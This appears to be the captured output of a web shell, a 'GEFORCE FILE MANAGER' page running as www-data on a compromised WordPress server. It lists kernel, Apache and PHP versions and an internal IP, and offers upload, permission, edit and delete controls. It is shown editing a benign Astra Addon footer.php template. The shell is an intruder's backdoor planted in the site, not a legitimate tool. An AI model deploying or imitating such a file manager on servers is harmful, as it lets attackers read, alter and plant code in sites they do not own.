[ SYSTEM ]: Linux wordpress 6.1.0-41-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.158-1 (2025-11-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
astra-addon
/
addons
/
lifterlms
/
templates
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 footer.php
515 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: footer.php
<?php /** * WooCommerce - Footer Template * * @package Astra Addon */ ?> <footer itemtype="https://schema.org/WPFooter" itemscope="itemscope" id="colophon" <?php astra_footer_classes(); ?>> <?php do_action( 'astra_woo_checkout_footer_content_top' ); ?> <?php true === astra_addon_builder_helper()->is_header_footer_builder_active ? do_action( 'astra_below_footer' ) : astra_footer_small_footer_template(); ?> <?php do_action( 'astra_woo_checkout_footer_content_bottom' ); ?> </footer><!-- #colophon -->